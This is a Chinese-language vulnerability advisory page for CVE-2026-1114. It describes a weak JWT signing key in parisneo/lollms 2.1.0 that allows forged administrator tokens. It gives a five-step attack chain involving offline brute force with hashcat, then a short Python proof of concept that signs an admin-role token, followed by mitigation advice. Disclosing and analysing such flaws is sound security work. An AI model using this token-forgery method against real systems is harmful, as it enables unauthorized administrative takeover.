CVE-2026-1114 CVSS 9.8 严重

CVE-2026-1114 lollms JWT弱密钥权限提升漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1114

漏洞类型

权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

parisneo/lollms

漏洞概述

parisneo/lollms 2.1.0版本存在严重的访问控制漏洞，其根本原因在于应用程序使用了弱密钥对JSON Web Tokens (JWT) 进行签名。由于密钥强度不足，攻击者能够通过离线暴力破解的方式恢复该密钥。一旦密钥被破解，攻击者便可以伪造有效的管理员令牌，从而绕过身份验证，提升权限并访问受限端点。该问题已在2.2.0版本中得到解决。

技术细节

该漏洞位于 parisneo/lollms 的会话管理机制中。应用程序依赖 JWT 来维护用户会话状态，但开发者使用了强度较弱的密钥（Secret Key）来对令牌进行签名。JWT 的安全性在很大程度上依赖于签名密钥的不可预测性。由于密钥较弱，攻击者可以截获合法的 JWT 令牌，并利用高性能计算资源进行离线暴力破解攻击。在成功计算出签名密钥后，攻击者可以修改 JWT 的 Payload 部分，将用户身份角色更改为管理员，并使用破解出的密钥重新生成有效的签名。这使得攻击者能够以管理员身份接管系统，执行任意管理操作，完全破坏了系统的机密性、完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标应用使用 parisneo/lollms，并发现其使用 JWT 进行身份验证。

STEP 2

2. 令牌截获

攻击者通过正常访问或网络嗅探获取一个合法的 JWT 令牌。

STEP 3

3. 离线暴力破解

攻击者使用工具（如 hashcat）对截获的 JWT 签名进行离线暴力破解，利用弱密钥特征恢复出 Secret Key。

STEP 4

4. 令牌伪造

攻击者修改 JWT Payload，将用户角色提升为 administrator，并使用破解出的密钥重新签名。

STEP 5

5. 权限提升与利用

攻击者将伪造的令牌发送给服务器，成功绕过访问控制，获得管理员权限并执行敏感操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import jwt
import datetime

# PoC: Forging an admin token using a weak secret key
# This script simulates the step after the attacker has cracked the weak key via brute force.

def forge_admin_token(weak_secret):
    # Payload modified to escalate privileges to Administrator
    payload = {
        "user_id": 1,
        "username": "admin",
        "role": "administrator", 
        "iat": datetime.datetime.utcnow(),
        "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=24)
    }

    # Generate a new JWT signed with the cracked weak secret
    # Algorithm is typically HS256 for this type of vulnerability
    forged_token = jwt.encode(payload, weak_secret, algorithm="HS256")
    
    return forged_token

if __name__ == "__main__":
    # In a real attack, this key is derived from offline cracking
    cracked_weak_key = "123456" 
    
    print("[+] Attempting to forge admin token with weak key...")
    admin_token = forge_admin_token(cracked_weak_key)
    print(f"[+] Forged Token: {admin_token}")
    print("[+] Attacker can now use this token to access administrative endpoints.")

影响范围

parisneo/lollms 2.1.0

parisneo/lollms < 2.2.0

防御指南

临时缓解措施

如果无法立即升级，请限制应用程序对公网的访问，仅允许受信任的 IP 地址连接。同时，检查服务器日志中是否存在异常的 JWT 签名验证失败或来自不明来源的管理员操作记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表